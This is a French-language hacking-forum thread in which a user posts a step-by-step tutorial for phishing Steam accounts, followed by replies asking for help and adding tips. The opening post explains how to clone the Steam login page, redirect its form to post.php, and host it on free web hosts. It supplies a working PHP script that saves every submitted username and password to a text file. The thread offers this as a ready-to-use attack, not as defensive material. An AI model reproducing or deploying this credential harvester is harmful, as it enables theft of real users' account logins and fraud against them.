Phishing STEAM.

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

slink91

Membre Banni
Dec 6, 2010
719
0
441
Bonjour à toutes et à tous ! Nouveau tutoriel sur le phishing STEAM.
Téléchargement:
-Filezilla
-NotePad ++
Hébergement de site:
t35.com
oslot.de
000webhost.com
Nous pouvons maintenant commencez après que vous vous aviez téléchargez les logiciels ainsi que les hébergements de site.
Aller sur le site steamcommunity.com ainsi veuillez faire clique droit sur la page et faire:"Afficher le code source de la page".
Copier et coller ensuite dans NotePad ++ votre code source et allez dans "Rechercher" puis y mettre "loginform" faites entrez.
Remplacer l'URL du site action="https://steamcommunity.com/" par post.php ce qui vous donnes: action="post.php"
Ensuite enregistrer votre page Type:Hyper text Markup Language File et nommer votre page:index.html
Créer une nouvelle page et y mettre le php suivant:
<?php
header ('Location:Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Ensuite enregistrer la page en Type:PHP Hypertext Preprocessor file et nommer votre page:post.php
Puis retourner sur le ftp est transférer Ses pages: index.html ainsi que post.php c'est alors que la page s'activera.
Ensuite aller sur votre site quand tout sera fait, écrivez n'importe quoi sur votre site de phishing c'est ainsi que post.php s'activera et créera le dossier usernames.txt qui contiendra mot de passe ainsi que le pseudo. Déconnectez vous de votre ftp entre chaque connection pour actualiser le fichier usernames.txt.
Un merci ne coûte que deux secondes :hap:.
Pour plus d'informations m'envoyer un MP :hap:
 

ZPK80

Nouveau membre
Jan 16, 2011
2
0
421
:salut:

Je débute un peu et je ne pige plus rien a partir de creer une page et mettre patati patata dedans XD pourrait tu me repondre stp
:bye:
 

skyforce

Membre actif
Aug 19, 2010
142
0
441
bande de noobs, il vous dit que c'est pour hacker vous comprenez rien c'est une fausse page de steam, le mec met ses identifiants et ça envoie tout par mail
 

ZPK80

Nouveau membre
Jan 16, 2011
2
0
421
oui mais je ne comprends pas comment la creer j ai bien recupere la source et enregistrer et quand je clic dessus sa me met bien la page de steam mais apres je suis perdu car c'est un peu du languages informatique =S
 

slink91

Membre Banni
Dec 6, 2010
719
0
441
Ok donc personnellement pas besoin de connaître le PHP suffit juste de copier coller le PHP que j'ai mis celui que j'ai fais donc il marche niquel :hap: et puis si vous arrivez pas avec ce tutoriel attender d'être plus mature pour certains :lol:
 

maska

Membre Banni
Apr 26, 2010
13
0
561
voila moi tout se déroule bien sauf ke an j'assaye de me co sur le site ac des faus idetifian bien sur sa marke ya pas de connection
 

letintin

Membre Banni
Jul 4, 2010
834
0
581
31
salut
Merci mais je comprens pas trop tu pourrais pas faire un tuto plus facile pour "noob"enfin débutant
s il te plait
 

Setaa

Membre
Dec 20, 2010
46
0
431
34
merci a toi ,

c'est compréhensif est bien expliquer :)
une petite question , la page il faut savoir crée le design ou pas besoin ?

merci à vous les mec & filles .
 

slink91

Membre Banni
Dec 6, 2010
719
0
441
De rien pour ce à qui sa marche et dommage pour les autres mais personnellement ce n'est vraiment pas compliquer il suffit de faire étape par étape ...
 

slink91

Membre Banni
Dec 6, 2010
719
0
441
Ecoute si tu penses qu'il est mal expliqué je vois pas comment sa se fait des personnes arrives à le suivre :hap: après pas de ma faute si certaines personnes on des déficites mentaux :hap:
 

adrio

Membre
Jan 24, 2010
12
0
566
34
Salut,
Pour recevoir le msg, il faut veillez a ce que les fichiers ai le Chmod 777
A+
 

slink91

Membre Banni
Dec 6, 2010
719
0
441
Steam on changer leur cryptage je dois chercher comment faire désolé poste en PAUSE ils sont mis un steam guard ...
 

slink91

Membre Banni
Dec 6, 2010
719
0
441
Bah faut crée l'index html comme il faut tu as dû te tromper en l'a faisant :hap: